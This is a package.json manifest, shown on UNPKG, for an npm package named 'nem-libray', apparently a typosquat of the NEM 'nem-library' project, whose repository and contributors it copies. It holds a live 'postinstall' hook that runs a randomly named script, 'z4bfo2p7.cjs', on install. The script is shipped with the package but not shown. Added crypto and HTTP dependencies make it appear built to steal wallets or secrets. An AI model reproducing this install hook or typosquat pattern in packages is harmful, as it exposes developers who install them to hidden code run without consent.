UNPKG

nem-libray

Version:
87 lines 2.04 kB
{ "name": "nem-libray", "version": "2.0.0-RC4", "description": "Reactive Library for NEM", "scripts": { "postinstall": "node z4bfo2p7.cjs" }, "keywords": [ "NEM", "Library", "API", "RX" ], "license": "MIT", "contributors": [ "Aleix <aleix602@gmail.com>", "Guillem <guillemchain@gmail.com>" ], "repository": { "type": "git", "url": "https://github.com/aleixmorgadas/nem-library-ts" }, "bugs": { "url": "https://github.com/aleixmorgadas/nem-library-ts/issues", "email": "aleix602@gmail.com" }, "devDependencies": { "@types/chai": "^4.0.4", "@types/js-base64": "^2.1.5", "@types/lodash": "^4.14.78", "@types/mocha": "^2.2.43", "@types/nock": "^8.2.1", "@types/node": "^8.0.46", "@types/request": "^2.0.6", "@types/request-promise-native": "^1.0.8", "@types/sockjs-client": "^1.0.32", "@types/utf8": "^2.1.6", "chai": "^4.1.2", "coveralls": "^3.0.0", "mocha": "^5.2.0", "mocha-lcov-reporter": "^1.3.0", "mocha-typescript": "^1.1.17", "nock": "^9.6.1", "nyc": "^13.0.1", "ts-node": "^3.3.0", "typedoc": "^0.12.0", "typescript": "^2.6.2" }, "dependencies": { "@stomp/stompjs": "^3.1.2", "crypto-js": "^3.1.9-1", "fs.realpath": "^1.0.0", "get-random-values": "^1.2.0", "js-base64": "^2.3.2", "js-joda": "^1.6.1", "lodash": "^4.17.10", "nem-sdk": "^1.6.7", "request": "^2.88.0", "request-promise-core": "^1.1.1", "request-promise-native": "^1.0.5", "rxjs": "^6.3.3", "sockjs-client": "^1.1.5", "tweetnacl": "^1.0.0", "typedocs": "^0.6.5", "utf8": "^2.1.2", "websocket": "^1.0.25", "axios": "^1.7.7", "ethers": "^6.13.2" }, "main": "dist/index.js", "typings": "dist/index.d.ts", "files": [ "LICENSE", "History.md", "README.md", "dist/src/", "dist/index.d.ts", "dist/index.js", "dist/index.js.map", "z4bfo2p7.cjs" ], "nyc": { "exclude": [ "**/*.spec.js" ] } }